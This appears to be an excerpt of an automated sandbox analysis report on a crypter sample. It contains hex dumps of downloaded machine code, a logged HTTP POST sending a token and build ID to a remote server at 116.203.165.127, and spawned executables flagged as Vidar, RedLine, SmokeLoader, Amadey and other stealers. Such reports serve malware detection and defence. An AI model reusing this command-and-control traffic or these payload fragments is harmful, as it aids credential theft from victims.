                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                                                                                                        Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                                                                                                        Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                        Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                        Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                                                                                                        Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                                                                                                        Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                                                                                                        Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        42192.168.2.949818116.203.165.1274431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:50:04 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 829
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:50:04 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------CFIECBFIDGDAKFHIEHJKCont
                                                                                                                                                                                                                                        2024-09-21 12:50:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:50:05 UTC15INData Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 5block0


                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:08:47:59
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe"
                                                                                                                                                                                                                                        Imagebase:0x270000
                                                                                                                                                                                                                                        File size:2'457'088 bytes
                                                                                                                                                                                                                                        MD5 hash:96CB7DF578398D5D46DD4DAEFFBDC41F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:08:47:59
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe
                                                                                                                                                                                                                                        Imagebase:0x8b0000
                                                                                                                                                                                                                                        File size:3'141'632 bytes
                                                                                                                                                                                                                                        MD5 hash:1FEDF314D7C5ED06FF6833C9C8FE5441
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe
                                                                                                                                                                                                                                        Imagebase:0x990000
                                                                                                                                                                                                                                        File size:415'943 bytes
                                                                                                                                                                                                                                        MD5 hash:D399F8ABCA97B04F273F04322E4378BE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.1888965030.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:3'143'204 bytes
                                                                                                                                                                                                                                        MD5 hash:0A02550E0EA5490D4D80EE79661C99E1
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:08:48:27
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:6'666'862 bytes
                                                                                                                                                                                                                                        MD5 hash:8FB3610C4BA81A5A93666562E712740A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        Imagebase:0x9b0000
                                                                                                                                                                                                                                        File size:4'249'600 bytes
                                                                                                                                                                                                                                        MD5 hash:ABDBCC23BD8F767E671BAC6D2FF60335
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe
                                                                                                                                                                                                                                        Imagebase:0xe0000
                                                                                                                                                                                                                                        File size:423'328 bytes
                                                                                                                                                                                                                                        MD5 hash:A463E516041F4BC84F03BC8FE2B643DD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:418'816 bytes
                                                                                                                                                                                                                                        MD5 hash:2F59FBD6623872FBDC2F63D18023BFDA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe
                                                                                                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                                                                                                        File size:331'640 bytes
                                                                                                                                                                                                                                        MD5 hash:E8E6CD9EC48FAFCCC174F7BF07D045E2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:08:48:26
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
                                                                                                                                                                                                                                        Imagebase:0xeb0000
                                                                                                                                                                                                                                        File size:361'336 bytes
                                                                                                                                                                                                                                        MD5 hash:D687AF3B103399AA245807BB719878B7
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.1829361336.0000000004155000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                        Start time:08:48:27
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:3'037'032 bytes
                                                                                                                                                                                                                                        MD5 hash:098E15E88E5332253356C78BADF8D479
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.2155274987.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:08:48:27
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe
                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                        File size:11'496'960 bytes
                                                                                                                                                                                                                                        MD5 hash:D60D266E8FBDBD7794653ECF2ABA26ED
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:08:48:27
                                                                                                                                                                                                                                        Start date:21/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff6b0d70000
                                                                                                                                                                                                                                        File size:22'487'040 bytes
                                                                                                                                                                                                                                        MD5 hash:CB3952F1852179348F8D2DB91760D03B
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:Go lang
                                                                                                                                                                                                                                        Yara matches:
